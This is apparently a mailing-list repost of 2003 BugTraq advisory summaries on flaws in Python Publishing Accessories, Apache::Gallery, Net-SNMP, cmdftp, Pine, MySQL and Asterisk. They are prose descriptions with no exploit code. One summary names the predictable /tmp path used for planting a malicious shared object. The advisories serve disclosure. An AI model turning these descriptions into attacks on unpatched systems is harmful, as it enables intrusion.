Python Publishing Accessories Error Messages Cross-Site Scri... BugTraq ID: 8549 Remote: Yes Date Published: Sep 05 2003 Relevant URL: http://www.securityfocus.com/bid/8549 Summary: Python Publishing Accessories is a library consisting of python modules that are used to create web publication systems.
A vulnerability has been reported to exist because of the error messages returned to a user in Python Publishing Accessories. This issue may allow a remote attacker to execute HTML or script code in a user's browser due to insufficient sanitization of user input. The problem is reported to exist due to a lack of sanitization of error messages by the software. The vulnerable software is reported to include requests for invalid URLs in error messages returned to a user without proper sanitization. HTML and script code will be rendered in a user's browser, therefore making it possible for an attacker to a construct a malicious link containing HTML or script code that may be rendered in a user's browser upon visiting that link. This attack would occur in the security context of the affected site. Successful exploitation of this vulnerability may allow an attacker to steal cookie-based authentication credentials. Other attacks may well be possible. This issue is reported to be present in Python Publishing Accessories version 0.2.1, however prior versions may be affected as well. Apache::Gallery Insecure Local File Storage Privilege Escala... BugTraq ID: 8561 Remote: No Date Published: Sep 08 2003 Relevant URL: http://www.securityfocus.com/bid/8561 Summary: Apache::Gallery is a perl module designed to be used with Apache and mod_perl. It's purpose is to create an index of picture thumbnails for each directory hosted by the server. When initializing Inline C from within the Gallery.pm file, Apache::Gallery fails to sufficiently store the files within a secure location. Specifically, it calls File::Spec->tmpdir() which will typically return a world writable temporary directory. This directory is then used for the storage of shared objects later linked to by Apache. These .so files also use predictable file names, making it possible for an attacker to potentially supply malicious shared object files that will be linked into Apache. An attacker could exploit this issue by constructing a malicious shared object file. The file may need to contain specific functions expected by Apache::Gallery to avoid errors. The attacker must simply place these files within the /tmp/lib/auto/Apache/Gallery_4033 directory, or which ever temporary directory is typically used, prior to Apache creating the shared object there. It should be noted that these shared object files must be replaced prior to the Apache process linking to them. This will result in malicious code being linked to and executed within the Apache process, effectively allowing for the execution of arbitrary code with elevated privileges. Net-SNMP Unauthorized MIB Object Access Vulnerability BugTraq ID: 8582 Remote: Yes Date Published: Sep 06 2003 Relevant URL: http://www.securityfocus.com/bid/8582 Summary: Net-SNMP is a freely available, open source implementation of the SNMP protocol. It was previously known as UCD-SNMP, and is available for the Unix and Linux operating systems. Net-SNMP is prone to a vulnerability that may permit an existing user or community to gain unauthorized access to MIB objects. MIB objects that are explicitly excluded from a user's or community's view may still be accessed due to this vulnerability. This could potentially allow malicious parties to gain read/write access to information contained in a restricted MIB. CmdFTP Store_Line() Heap Overflow Vulnerability BugTraq ID: 8587 Remote: Yes Date Published: Sep 08 2003 Relevant URL: http://www.securityfocus.com/bid/8587 Summary: cmdftp is a command line FTP client for Linux. cmdftp has been reported prone to a remote heap overflow vulnerability. The issue presents itself likely due to insufficient boundary checks performed by store_line() when handling ftp server directory listings. Excessive data returned by a malicious FTP server, when an 'ls' command is invoked, may overflow the bounds of a buffer in heap memory and result in the corruption of adjacent heap memory management structures. Ultimately a remote attacker may leverage this corruption to have supplied arbitrary instructions executed in the context of the user who is running the vulnerable FTP client. This vulnerability has been reported to affect all versions of cmdftp prior to version 0.641. Pine Message/External-Body Type Attribute Buffer Overflow Vu... BugTraq ID: 8588 Remote: Yes Date Published: Sep 10 2003 Relevant URL: http://www.securityfocus.com/bid/8588 Summary: Pine is a freely available, open source Mail User Agent. It is distributed by the University of Washington, and available for the Unix, Linux, and Microsoft platforms. A problem in Pine has been reported when handling "message/external body type" attributes. Because of this, an attacker may be able to gain unauthorized access to a host using the vulnerable software. The problem is in the parsing of the name/value pairs. Due to improper bounds checking, it is possible to supply a value in this field that results in the overwriting of sensitive process memory. An attacker can exploit this with a custom string to execute arbitrary code with the privileges of the Pine user. Pine rfc2231_get_param() Remote Integer Overflow Vulnerabili... BugTraq ID: 8589 Remote: Yes Date Published: Sep 10 2003 Relevant URL: http://www.securityfocus.com/bid/8589 Summary: Pine is an e-mail client program used with Linux and Unix distributions. It has been reported that Pine is prone to an integer overflow condition resulting in possible memory corruption and leading to arbitrary code execution. The vulnerability exists in the rfc2231_get_param() function present in the strings.c file. The condition is triggered when a vulnerable user opens a maliciously crafted e-mail message sent by a remote attacker. The vulnerability exists due to insufficient bounds checking by the software when parsing e-mail message headers. Due to the possibility of memory corruption, an attacker may be able to execute arbitrary code in the security context of the vulnerable version of Pine. Successful exploitation of this issue may allow an attacker to execute arbitrary code in order to gain unauthorized access to a vulnerable host. MySQL Password Handler Buffer Overflow Vulnerability BugTraq ID: 8590 Remote: Yes Date Published: Sep 10 2003 Relevant URL: http://www.securityfocus.com/bid/8590 Summary: MySQL is an open source relational database project. It is available for the Microsoft Windows, Linux, and Unix operating systems. MySQL server has been reported prone to a buffer overflow vulnerability when handling user passwords of excessive size. The issue presents itself, due to a lack of sufficient bounds checking performed on MySQL user passwords that are stored in the 'Password' field of the 'User' table in a MySQL database. It has been reported that MySQL fails to properly perform bounds checking when processing passwords. A password greater that 16 characters may overrun the bounds of a reserved buffer in memory and corrupt adjacent memory. The buffer overflow occurs in an ACL_USER instance of acl_init(), and may ultimately result in the corruption of a saved instruction pointer. An attacker with global administrative privileges on an affected MySQL server may potentially exploit this condition to have arbitrary supplied instructions executed in the context of the MySQL server. This vulnerability has been reported to affect all versions of MySQL up to and including 4.0.14 and 3.0.57. Asterisk CallerID Call Detail Records SQL Injection Vulnerab... BugTraq ID: 8599 Remote: Yes Date Published: Sep 11 2003 Relevant URL: http://www.securityfocus.com/bid/8599 Summary: Asterisk is a software-based PBX system, which is available for Linux operating systems. Asterisk includes support for various protocols including SIP, IAX v1 and v2, and H323. It is back-ended by a relational database. Call Detail Records (CDR) are used by telephone systems to record various user data. This includes a variety of information, such as the CallerID data. Asterisk is prone to SQL injection attacks via malformed CDR data. The vulnerability occurs due to insufficient sanitization of user-supplied CallerID data and could allow for the execution of SQL commands on the system hosting Asterisk. This could potentially be exploited by an attacker to influence the logic of SQL queries or to exploit vulnerabilities in the underlying database. Other attacks may also be possible. For an attacker to exploit this issue, it would have to be possible for them to modify the CallerID data sent out by their phone system. _______________________________________________ gull-annonces mailing list [EMAIL PROTECTED] http://lists.alphanet.ch/mailman/listinfo/gull-annonces
